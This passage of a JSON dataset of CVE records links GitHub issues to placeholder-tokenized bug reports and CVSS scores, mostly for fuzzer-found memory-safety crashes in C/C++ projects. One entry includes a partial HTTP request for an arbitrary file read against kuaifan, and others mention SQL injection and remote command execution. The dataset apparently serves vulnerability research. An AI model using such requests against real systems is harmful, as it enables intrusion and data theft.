  66918. "Issue_Created_At": "2020-08-30T15:53:54Z",
  66919. "description": "A heap buffer overflow in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG faad (latest master NUMBERTAG ae URLTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" ./configure enable shared=no Command line PATHTAG w b NUMBERTAG APITAG APITAG output ERRORTAG POC FILETAG",
  66920. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  66921. "severity": "HIGH",
  66922. "baseScore": 7.8,
  66923. "impactScore": 5.9,
  66924. "exploitabilityScore": 1.8
  66925. },
  66926. {
  66927. "CVE_ID": "CVE-2021-32275",
  66928. "Issue_Url_old": "https://github.com/grame-cncm/faust/issues/482",
  66929. "Issue_Url_new": "https://github.com/grame-cncm/faust/issues/482",
  66930. "Repo_new": "grame-cncm/faust",
  66931. "Issue_Created_At": "2020-08-26T02:30:17Z",
  66932. "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG faust (latest master c NUMBERTAG d2 URLTAG Configure cmake . DCMAKE_CXX_FLAGS=\" fsanitize=address g\" DCMAKE_C_FLAGS=\" fsanitize=address g\" DCMAKE_EXE_LINKER_FLAGS=\" fsanitize=address\" DINCLUDE_STATIC=on DINCLUDE_HTTP=off DINCLUDE_OSC=off Command line PATHTAG lang ocpp o /tmp/faust e lcc exp NUMBERTAG lb rb mem sd APITAG APITAG output ERRORTAG POC FILETAG",
  66933. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  66934. "severity": "MEDIUM",
  66935. "baseScore": 5.5,
  66936. "impactScore": 3.6,
  66937. "exploitabilityScore": 1.8
  66938. },
  66939. {
  66940. "CVE_ID": "CVE-2021-32276",
  66941. "Issue_Url_old": "https://github.com/knik0/faad2/issues/58",
  66942. "Issue_Url_new": "https://github.com/knik0/faad2/issues/58",
  66943. "Repo_new": "knik0/faad2",
  66944. "Issue_Created_At": "2020-08-30T15:29:51Z",
  66945. "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG faad (latest master NUMBERTAG ae URLTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" ./configure enable shared=no Command line PATHTAG w b NUMBERTAG APITAG APITAG output ERRORTAG POC FILETAG",
  66946. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  66947. "severity": "MEDIUM",
  66948. "baseScore": 5.5,
  66949. "impactScore": 3.6,
  66950. "exploitabilityScore": 1.8
  66951. },
  66952. {
  66953. "CVE_ID": "CVE-2021-32277",
  66954. "Issue_Url_old": "https://github.com/knik0/faad2/issues/59",
  66955. "Issue_Url_new": "https://github.com/knik0/faad2/issues/59",
  66956. "Repo_new": "knik0/faad2",
  66957. "Issue_Created_At": "2020-08-30T15:32:46Z",
  66958. "description": "A heap buffer overflow in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG faad (latest master NUMBERTAG ae URLTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" ./configure enable shared=no Command line PATHTAG w b NUMBERTAG APITAG APITAG output ERRORTAG POC FILETAG",
  66959. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  66960. "severity": "HIGH",
  66961. "baseScore": 7.8,
  66962. "impactScore": 5.9,
  66963. "exploitabilityScore": 1.8
  66964. },
  66965. {
  66966. "CVE_ID": "CVE-2021-32278",
  66967. "Issue_Url_old": "https://github.com/knik0/faad2/issues/62",
  66968. "Issue_Url_new": "https://github.com/knik0/faad2/issues/62",
  66969. "Repo_new": "knik0/faad2",
  66970. "Issue_Created_At": "2020-09-04T14:47:28Z",
  66971. "description": "A heap buffer overflow in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG faad (latest master f NUMBERTAG b5e URLTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" ./configure enable shared=no Command line PATHTAG w b NUMBERTAG APITAG APITAG output ERRORTAG POC FILETAG",
  66972. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  66973. "severity": "HIGH",
  66974. "baseScore": 7.8,
  66975. "impactScore": 5.9,
  66976. "exploitabilityScore": 1.8
  66977. },
  66978. {
  66979. "CVE_ID": "CVE-2021-32281",
  66980. "Issue_Url_old": "https://github.com/marcobambini/gravity/issues/313",
  66981. "Issue_Url_new": "https://github.com/marcobambini/gravity/issues/313",
  66982. "Repo_new": "marcobambini/gravity",
  66983. "Issue_Created_At": "2020-08-07T04:58:06Z",
  66984. "description": "A heap buffer overflow in APITAG can cause abort. System info Ubuntu NUMBERTAG clang NUMBERTAG gravity (latest master ecbee9f URLTAG Configure cmake .. DCMAKE_CXX_FLAGS=\" fsanitize=address g\" DCMAKE_C_FLAGS=\" fsanitize=address g\" DCMAKE_EXE_LINKER_FLAGS=\" fsanitize=address\" Command line PATHTAG o /tmp/grav q c APITAG Output ERRORTAG APITAG output ERRORTAG POC FILETAG",
  66985. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  66986. "severity": "HIGH",
  66987. "baseScore": 7.8,
  66988. "impactScore": 5.9,
  66989. "exploitabilityScore": 1.8
  66990. },
  66991. {
  66992. "CVE_ID": "CVE-2021-32282",
  66993. "Issue_Url_old": "https://github.com/marcobambini/gravity/issues/315",
  66994. "Issue_Url_new": "https://github.com/marcobambini/gravity/issues/315",
  66995. "Repo_new": "marcobambini/gravity",
  66996. "Issue_Created_At": "2020-08-07T14:09:43Z",
  66997. "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG gravity (latest master ecbee9f URLTAG Configure cmake .. DCMAKE_CXX_FLAGS=\" fsanitize=address g\" DCMAKE_C_FLAGS=\" fsanitize=address g\" DCMAKE_EXE_LINKER_FLAGS=\" fsanitize=address\" Command line PATHTAG o /tmp/grav q c APITAG Output Segmentation fault APITAG output ERRORTAG POC FILETAG",
  66998. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  66999. "severity": "MEDIUM",
  67000. "baseScore": 5.5,
  67001. "impactScore": 3.6,
  67002. "exploitabilityScore": 1.8
  67003. },
  67004. {
  67005. "CVE_ID": "CVE-2021-32283",
  67006. "Issue_Url_old": "https://github.com/marcobambini/gravity/issues/314",
  67007. "Issue_Url_new": "https://github.com/marcobambini/gravity/issues/314",
  67008. "Repo_new": "marcobambini/gravity",
  67009. "Issue_Created_At": "2020-08-07T14:07:36Z",
  67010. "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG gravity (latest master ecbee9f URLTAG Configure cmake .. DCMAKE_CXX_FLAGS=\" fsanitize=address g\" DCMAKE_C_FLAGS=\" fsanitize=address g\" DCMAKE_EXE_LINKER_FLAGS=\" fsanitize=address\" Command line PATHTAG o /tmp/grav q c APITAG Output Segmentation fault APITAG output ERRORTAG POC FILETAG",
  67011. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  67012. "severity": "MEDIUM",
  67013. "baseScore": 5.5,
  67014. "impactScore": 3.6,
  67015. "exploitabilityScore": 1.8
  67016. },
  67017. {
  67018. "CVE_ID": "CVE-2021-32284",
  67019. "Issue_Url_old": "https://github.com/marcobambini/gravity/issues/321",
  67020. "Issue_Url_new": "https://github.com/marcobambini/gravity/issues/321",
  67021. "Repo_new": "marcobambini/gravity",
  67022. "Issue_Created_At": "2020-08-30T16:46:44Z",
  67023. "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG gravity (latest master c NUMBERTAG e NUMBERTAG URLTAG Configure cmake .. DCMAKE_CXX_FLAGS=\" fsanitize=address g\" DCMAKE_C_FLAGS=\" fsanitize=address g\" DCMAKE_EXE_LINKER_FLAGS=\" fsanitize=address\" Command line PATHTAG APITAG APITAG output ERRORTAG POC FILETAG",
  67024. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  67025. "severity": "HIGH",
  67026. "baseScore": 7.8,
  67027. "impactScore": 5.9,
  67028. "exploitabilityScore": 1.8
  67029. },
  67030. {
  67031. "CVE_ID": "CVE-2021-32285",
  67032. "Issue_Url_old": "https://github.com/marcobambini/gravity/issues/319",
  67033. "Issue_Url_new": "https://github.com/marcobambini/gravity/issues/319",
  67034. "Repo_new": "marcobambini/gravity",
  67035. "Issue_Created_At": "2020-08-30T16:37:45Z",
  67036. "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG gravity (latest master c NUMBERTAG e NUMBERTAG URLTAG Configure cmake .. DCMAKE_CXX_FLAGS=\" fsanitize=address g\" DCMAKE_C_FLAGS=\" fsanitize=address g\" DCMAKE_EXE_LINKER_FLAGS=\" fsanitize=address\" Command line PATHTAG APITAG APITAG output ERRORTAG POC FILETAG",
  67037. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  67038. "severity": "MEDIUM",
  67039. "baseScore": 5.5,
  67040. "impactScore": 3.6,
  67041. "exploitabilityScore": 1.8
  67042. },
  67043. {
  67044. "CVE_ID": "CVE-2021-32286",
  67045. "Issue_Url_old": "https://github.com/ZerBea/hcxtools/issues/155",
  67046. "Issue_Url_new": "https://github.com/zerbea/hcxtools/issues/155",
  67047. "Repo_new": "zerbea/hcxtools",
  67048. "Issue_Created_At": "2020-08-12T03:09:27Z",
  67049. "description": "A memcpy param overlap in APITAG System info Ubuntu NUMBERTAG clang NUMBERTAG hcxpcapngtool (latest master e6b NUMBERTAG URLTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" make Command line ./hcxpcapngtool all o /dev/null APITAG APITAG output ERRORTAG POC FILETAG",
  67050. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  67051. "severity": "HIGH",
  67052. "baseScore": 7.8,
  67053. "impactScore": 5.9,
  67054. "exploitabilityScore": 1.8
  67055. },
  67056. {
  67057. "CVE_ID": "CVE-2021-32287",
  67058. "Issue_Url_old": "https://github.com/nokiatech/heif/issues/86",
  67059. "Issue_Url_new": "https://github.com/nokiatech/heif/issues/86",
  67060. "Repo_new": "nokiatech/heif",
  67061. "Issue_Created_At": "2020-08-04T07:58:10Z",
  67062. "description": "A global buffer overflow in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), heif (latest master NUMBERTAG fc NUMBERTAG e URLTAG Configure cmake ../srcs DCMAKE_CXX_FLAGS=\" fsanitize=address g\" DCMAKE_C_FLAGS=\" fsanitize=address g\" DCMAKE_EXE_LINKER_FLAGS=\" fsanitize=address\" Command line modify APITAG use APITAG to receive filename from commandline. PATHTAG APITAG APITAG output ERRORTAG POC FILETAG",
  67063. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  67064. "severity": "HIGH",
  67065. "baseScore": 7.8,
  67066. "impactScore": 5.9,
  67067. "exploitabilityScore": 1.8
  67068. },
  67069. {
  67070. "CVE_ID": "CVE-2021-32288",
  67071. "Issue_Url_old": "https://github.com/nokiatech/heif/issues/87",
  67072. "Issue_Url_new": "https://github.com/nokiatech/heif/issues/87",
  67073. "Repo_new": "nokiatech/heif",
  67074. "Issue_Created_At": "2020-08-04T14:03:20Z",
  67075. "description": "A global buffer overflow in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), heif (latest master NUMBERTAG fc NUMBERTAG e URLTAG Configure cmake ../srcs DCMAKE_CXX_FLAGS=\" fsanitize=address g\" DCMAKE_C_FLAGS=\" fsanitize=address g\" DCMAKE_EXE_LINKER_FLAGS=\" fsanitize=address\" Command line modify APITAG use APITAG to receive filename from command line. PATHTAG APITAG APITAG output ERRORTAG POC FILETAG",
  67076. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  67077. "severity": "HIGH",
  67078. "baseScore": 7.8,
  67079. "impactScore": 5.9,
  67080. "exploitabilityScore": 1.8
  67081. },
  67082. {
  67083. "CVE_ID": "CVE-2021-32289",
  67084. "Issue_Url_old": "https://github.com/nokiatech/heif/issues/85",
  67085. "Issue_Url_new": "https://github.com/nokiatech/heif/issues/85",
  67086. "Repo_new": "nokiatech/heif",
  67087. "Issue_Created_At": "2020-08-04T07:55:57Z",
  67088. "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), heif (latest master NUMBERTAG fc NUMBERTAG e URLTAG Configure cmake ../srcs DCMAKE_CXX_FLAGS=\" fsanitize=address g\" DCMAKE_C_FLAGS=\" fsanitize=address g\" DCMAKE_EXE_LINKER_FLAGS=\" fsanitize=address\" Command line modify APITAG use APITAG to receive filename from commandline. PATHTAG APITAG Output Segmentation fault APITAG output ERRORTAG POC FILETAG",
  67089. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  67090. "severity": "MEDIUM",
  67091. "baseScore": 5.5,
  67092. "impactScore": 3.6,
  67093. "exploitabilityScore": 1.8
  67094. },
  67095. {
  67096. "CVE_ID": "CVE-2021-32294",
  67097. "Issue_Url_old": "https://github.com/drbye78/libgig/issues/1",
  67098. "Issue_Url_new": "https://github.com/drbye78/libgig/issues/1",
  67099. "Repo_new": "drbye78/libgig",
  67100. "Issue_Created_At": "2020-08-15T14:27:18Z",
  67101. "description": "A heap buffer overflow in APITAG The User account creation has been disabled in Bugzilla, so I have to report it here. System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), gigextract (latest master NUMBERTAG fd8 URLTAG Command line PATHTAG APITAG /tmp/libgig APITAG output ERRORTAG POC FILETAG",
  67102. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  67103. "severity": "HIGH",
  67104. "baseScore": 8.8,
  67105. "impactScore": 5.9,
  67106. "exploitabilityScore": 2.8
  67107. },
  67108. {
  67109. "CVE_ID": "CVE-2021-32297",
  67110. "Issue_Url_old": "https://github.com/lief-project/LIEF/issues/449",
  67111. "Issue_Url_new": "https://github.com/lief-project/lief/issues/449",
  67112. "Repo_new": "lief-project/lief",
  67113. "Issue_Created_At": "2020-08-07T13:04:22Z",
  67114. "description": "A heap overflow in APITAG (not issue in the library). System info Ubuntu NUMBERTAG gcc, pe_reader (latest master NUMBERTAG bbe NUMBERTAG URLTAG Configure cmake .. DCMAKE_CXX_FLAGS=\" fsanitize=address g\" DCMAKE_C_FLAGS=\" fsanitize=address g\" DCMAKE_EXE_LINKER_FLAGS=\" fsanitize=address\" Command line PATHTAG APITAG APITAG output ERRORTAG POC FILETAG",
  67115. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  67116. "severity": "HIGH",
  67117. "baseScore": 8.8,
  67118. "impactScore": 5.9,
  67119. "exploitabilityScore": 2.8
  67120. },
  67121. {
  67122. "CVE_ID": "CVE-2021-32298",
  67123. "Issue_Url_old": "https://github.com/svanderburg/libiff/issues/10",
  67124. "Issue_Url_new": "https://github.com/svanderburg/libiff/issues/10",
  67125. "Repo_new": "svanderburg/libiff",
  67126. "Issue_Created_At": "2020-08-04T06:53:28Z",
  67127. "description": "A global buffer overflow in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), iffpp (latest master NUMBERTAG be4 URLTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" ./configure Command line PATHTAG APITAG Output APITAG output ERRORTAG POC FILETAG",
  67128. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  67129. "severity": "HIGH",
  67130. "baseScore": 8.8,
  67131. "impactScore": 5.9,
  67132. "exploitabilityScore": 2.8
  67133. },
  67134. {
  67135. "CVE_ID": "CVE-2021-32299",
  67136. "Issue_Url_old": "https://github.com/mmp/pbrt-v3/issues/296",
  67137. "Issue_Url_new": "https://github.com/mmp/pbrt-v3/issues/296",
  67138. "Repo_new": "mmp/pbrt-v3",
  67139. "Issue_Created_At": "2020-08-04T08:57:10Z",
  67140. "description": "A stack buffer overflow in APITAG with default test case. System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), pbrt (latest master aaa NUMBERTAG URLTAG Configure cmake ../srcs DCMAKE_CXX_FLAGS=\" fsanitize=address g\" DCMAKE_C_FLAGS=\" fsanitize=address g\" DCMAKE_EXE_LINKER_FLAGS=\" fsanitize=address\" Command line PATHTAG quick PATHTAG outfile /tmp/pbrt APITAG output ERRORTAG POC FILETAG",
  67141. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  67142. "severity": "HIGH",
  67143. "baseScore": 7.8,
  67144. "impactScore": 5.9,
  67145. "exploitabilityScore": 1.8
  67146. },
  67147. {
  67148. "CVE_ID": "CVE-2021-3242",
  67149. "Issue_Url_old": "https://github.com/duxphp/DuxCMS3/issues/4",
  67150. "Issue_Url_new": "https://github.com/duxphp/duxcms3/issues/4",
  67151. "Repo_new": "duxphp/duxcms3",
  67152. "Issue_Created_At": "2021-01-17T02:07:36Z",
  67153. "description": "backend sql injection vulnerability. sql injection vulnerability exists in tools APITAG module, url is PATHTAG please check FILETAG NUMBERTAG more details in URLTAG",
  67154. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  67155. "severity": "CRITICAL",
  67156. "baseScore": 9.8,
  67157. "impactScore": 5.9,
  67158. "exploitabilityScore": 3.9
  67159. },
  67160. {
  67161. "CVE_ID": "CVE-2021-32434",
  67162. "Issue_Url_old": "https://github.com/leesavide/abcm2ps/issues/83",
  67163. "Issue_Url_new": "https://github.com/lewdlime/abcm2ps/issues/83",
  67164. "Repo_new": "lewdlime/abcm2ps",
  67165. "Issue_Created_At": "2021-04-27T02:14:17Z",
  67166. "description": "Out of bounds read in APITAG in calculate_beam. In function APITAG in draw.c . There is out of bounds read in array min_tb at line NUMBERTAG and NUMBERTAG the flaw will cause crash. ERRORTAG The (unsigned) s >nflags can be checked whether between NUMBERTAG and NUMBERTAG I am not sure what the APITAG means so i didn't try to fix it. gdb info: ERRORTAG reproduce: APITAG FILETAG FILETAG",
  67167. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  67168. "severity": "MEDIUM",
  67169. "baseScore": 5.5,
  67170. "impactScore": 3.6,
  67171. "exploitabilityScore": 1.8
  67172. },
  67173. {
  67174. "CVE_ID": "CVE-2021-32435",
  67175. "Issue_Url_old": "https://github.com/leesavide/abcm2ps/issues/84",
  67176. "Issue_Url_new": "https://github.com/lewdlime/abcm2ps/issues/84",
  67177. "Repo_new": "lewdlime/abcm2ps",
  67178. "Issue_Created_At": "2021-04-27T03:41:52Z",
  67179. "description": "stack buffer overflow in function APITAG in parse.c. Stack buffer over found in parse.c in function APITAG The root cause maybe is in function APITAG the array accs and pits size is NUMBERTAG If APITAG bigger than NUMBERTAG then the array accs and pits will access out of index and corrupt the stack, if the value of APITAG is more bigger, then the stack frame will be corrupted. CODETAG gdb APITAG gef\u27a4 disassemble set_k_acc Dump of assembler code for function set_k_acc NUMBERTAG f NUMBERTAG c APITAG : endbr NUMBERTAG f NUMBERTAG APITAG : push rbp NUMBERTAG f NUMBERTAG APITAG : mov rbp,rsp NUMBERTAG f NUMBERTAG APITAG : sub rsp NUMBERTAG f NUMBERTAG APITAG : mov QWORD PTR [rbp NUMBERTAG rdi NUMBERTAG f NUMBERTAG APITAG mov rax, QWORD PTR [rbp NUMBERTAG f NUMBERTAG APITAG xor rax, QWORD PTR fs NUMBERTAG f NUMBERTAG e APITAG je NUMBERTAG f NUMBERTAG APITAG NUMBERTAG f NUMBERTAG APITAG call NUMBERTAG ba NUMBERTAG APITAG NUMBERTAG f NUMBERTAG APITAG leave \u2500 APITAG NUMBERTAG for (i NUMBERTAG i APITAG u. APITAG = accs[i NUMBERTAG s >u. APITAG = pits[i NUMBERTAG s >u. APITAG = nacc NUMBERTAG gef\u27a4 x/gx $rbp NUMBERTAG fffffffe NUMBERTAG gef\u27a4 p $fs NUMBERTAG",
  67180. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  67181. "severity": "MEDIUM",
  67182. "baseScore": 5.5,
  67183. "impactScore": 3.6,
  67184. "exploitabilityScore": 1.8
  67185. },
  67186. {
  67187. "CVE_ID": "CVE-2021-32436",
  67188. "Issue_Url_old": "https://github.com/leesavide/abcm2ps/issues/85",
  67189. "Issue_Url_new": "https://github.com/lewdlime/abcm2ps/issues/85",
  67190. "Repo_new": "lewdlime/abcm2ps",
  67191. "Issue_Created_At": "2021-04-27T07:57:56Z",
  67192. "description": "out of bounds read in function APITAG in subs.c. Out of bounds read found in function APITAG in subs.c. The flow allows attackers to cause denial of service. Here didn't check whether APITAG is valid . gdb info: ERRORTAG reproduce : (poc zipped ) ERRORTAG FILETAG",
  67193. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  67194. "severity": "MEDIUM",
  67195. "baseScore": 6.5,
  67196. "impactScore": 3.6,
  67197. "exploitabilityScore": 2.8
  67198. },
  67199. {
  67200. "CVE_ID": "CVE-2021-32437",
  67201. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1770",
  67202. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1770",
  67203. "Repo_new": "gpac/gpac",
  67204. "Issue_Created_At": "2021-04-30T08:10:59Z",
  67205. "description": "Null pointer dereference in function gf_hinter_finalize APITAG A null pointer dereference issue was found in APITAG to reproduce, compile gpac as follows: APITAG run poc file : APITAG Detailed ASAN result is as below: ERRORTAG Credit : APITAG of Venustech FILETAG",
  67206. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  67207. "severity": "MEDIUM",
  67208. "baseScore": 5.5,
  67209. "impactScore": 3.6,
  67210. "exploitabilityScore": 1.8
  67211. },
  67212. {
  67213. "CVE_ID": "CVE-2021-32438",
  67214. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1769",
  67215. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1769",
  67216. "Repo_new": "gpac/gpac",
  67217. "Issue_Created_At": "2021-04-30T08:03:06Z",
  67218. "description": "Null pointer dereference in gpac APITAG gf_media_export_filters. A null pointer dereference issue was found in APITAG to reproduce, compile gpac as follows: APITAG run poc file : APITAG Detailed ASAN result is as below: ERRORTAG Credit : APITAG of Venustech FILETAG",
  67219. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  67220. "severity": "MEDIUM",
  67221. "baseScore": 5.5,
  67222. "impactScore": 3.6,
  67223. "exploitabilityScore": 1.8
  67224. },
  67225. {
  67226. "CVE_ID": "CVE-2021-32439",
  67227. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1774",
  67228. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1774",
  67229. "Repo_new": "gpac/gpac",
  67230. "Issue_Created_At": "2021-04-30T08:40:50Z",
  67231. "description": "Out of bounds Write in APITAG A OOB Write issue was found in APITAG to reproduce, compile gpac as follows: APITAG run poc file : APITAG Detailed ASAN result is as below: ERRORTAG Credit : APITAG of Venustech FILETAG",
  67232. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  67233. "severity": "HIGH",
  67234. "baseScore": 7.8,
  67235. "impactScore": 5.9,
  67236. "exploitabilityScore": 1.8
  67237. },
  67238. {
  67239. "CVE_ID": "CVE-2021-32440",
  67240. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1772",
  67241. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1772",
  67242. "Repo_new": "gpac/gpac",
  67243. "Issue_Created_At": "2021-04-30T08:25:12Z",
  67244. "description": "SEGV in gpac APITAG function APITAG A SEGV issue was found in APITAG to reproduce, compile gpac as follows: APITAG run poc file : APITAG Detailed ASAN result is as below: ERRORTAG Credit : APITAG of Venustech FILETAG",
  67245. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  67246. "severity": "MEDIUM",
  67247. "baseScore": 5.5,
  67248. "impactScore": 3.6,
  67249. "exploitabilityScore": 1.8
  67250. },
  67251. {
  67252. "CVE_ID": "CVE-2021-3246",
  67253. "Issue_Url_old": "https://github.com/libsndfile/libsndfile/issues/687",
  67254. "Issue_Url_new": "https://github.com/libsndfile/libsndfile/issues/687",
  67255. "Repo_new": "libsndfile/libsndfile",
  67256. "Issue_Created_At": "2021-01-15T10:43:55Z",
  67257. "description": "heap buffer overflow in in msadpcm_decode_block. Hi, I found a heap buffer overflow in in msadpcm_decode_block PATHTAG I'm on an NUMBERTAG Ubuntu NUMBERTAG with Clang NUMBERTAG The APITAG report is the following: ERRORTAG To reproduce on git master: CODETAG The testcase that triggers the bug is (decompress it before): FILETAG",
  67258. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  67259. "severity": "HIGH",
  67260. "baseScore": 8.8,
  67261. "impactScore": 5.9,
  67262. "exploitabilityScore": 2.8
  67263. },
  67264. {
  67265. "CVE_ID": "CVE-2021-32546",
  67266. "Issue_Url_old": "https://github.com/gogs/gogs/issues/6555",
  67267. "Issue_Url_new": "https://github.com/gogs/gogs/issues/6555",
  67268. "Repo_new": "gogs/gogs",
  67269. "Issue_Created_At": "2021-05-10T15:04:02Z",
  67270. "description": "Remote Command Execution. Hello, we are security researchers from Unicorn ( URLTAG and we have identified a serious vulnerability that is exploitable from the position of a registered user. The vulnerability allows the Remote Command Execution, leading to full server takeover. The details will be sent to FILETAG as requested. Regards, Marek Malcovsk\u00fd & Petr Pernik\u00e1\u0159",
  67271. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  67272. "severity": "HIGH",
  67273. "baseScore": 8.8,
  67274. "impactScore": 5.9,
  67275. "exploitabilityScore": 2.8
  67276. },
  67277. {
  67278. "CVE_ID": "CVE-2021-32559",
  67279. "Issue_Url_old": "https://github.com/mhammond/pywin32/issues/1700",
  67280. "Issue_Url_new": "https://github.com/mhammond/pywin32/issues/1700",
  67281. "Repo_new": "mhammond/pywin32",
  67282. "Issue_Created_At": "2021-05-11T20:56:14Z",
  67283. "description": "Integer overflow in APITAG Context When an ACL is resized to add an ACE, it is possible to craft an integer overflow targeting the calculated\u202f APITAG . This results in a smaller than required buffer allocation which causes its\u202f memcpy \u202fof the ACL data to result in a heap overflow. Expected behavior and actual behavior Expected Behavior: Throw an exception indicating that the ACE could not be added because there is not enough room left in the ACL before hitting the size limit. Actual Behavior: The\u202f APITAG \u202fis overflowed and the\u202f memcpy \u202fresults in a heap overflow. Steps to reproduce the problem This was reproduced by adding roughly NUMBERTAG ACEs to an ACL. The exact count of ACEs that need to be added before reproducing the issue will vary based on the length of the SID in the ACE entry and the current size of the ACL being modified. Reproduction Goal: Add an ACE to an ACL such that the new size would be larger than\u202f APITAG . Version of Python and pywin NUMBERTAG Tested on Python NUMBERTAG with pywin NUMBERTAG b NUMBERTAG Appears to effect version b NUMBERTAG through b NUMBERTAG CVE CVETAG APITAG",
  67284. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  67285. "severity": "MEDIUM",
  67286. "baseScore": 6.5,
  67287. "impactScore": 3.6,
  67288. "exploitabilityScore": 2.8
  67289. },
  67290. {
  67291. "CVE_ID": "CVE-2021-3256",
  67292. "Issue_Url_old": "https://github.com/poropro/kuaifan/issues/3",
  67293. "Issue_Url_new": "https://github.com/poropro/kuaifan/issues/3",
  67294. "Repo_new": "poropro/kuaifan",
  67295. "Issue_Created_At": "2021-01-13T08:41:16Z",
  67296. "description": "Arbitrary file read vulnerability in the html_url parameter of the FILETAG . Hello, I found that there is a Arbitrary file read vulnerability in the html_url parameter of the FILETAG file on the website. The html_url parameter is not filtered for dangerous characters, resulting in a vulnerability. FILETAG Read the database configuration file through the vulnerability FILETAG FILETAG poc : POST APITAG &vs NUMBERTAG c=chakanhtml&a=index HTTP NUMBERTAG Host: kuaifan.com User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG WOW NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG US; APITAG Accept Encoding: gzip, deflate Content Type: application/x www form urlencoded Content Length NUMBERTAG Referer: URLTAG Cookie: APITAG APITAG APITAG APITAG APITAG APITAG APITAG UM_distinctid NUMBERTAG aa0c7f NUMBERTAG b NUMBERTAG d9b NUMBERTAG a7a NUMBERTAG d4a NUMBERTAG aa0c7f NUMBERTAG Connection: close Upgrade Insecure Requests NUMBERTAG APITAG",
  67297. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  67298. "severity": "MEDIUM",
  67299. "baseScore": 6.5,
  67300. "impactScore": 3.6,
  67301. "exploitabilityScore": 2.8
  67302. },
  67303. {
  67304. "CVE_ID": "CVE-2021-32613",
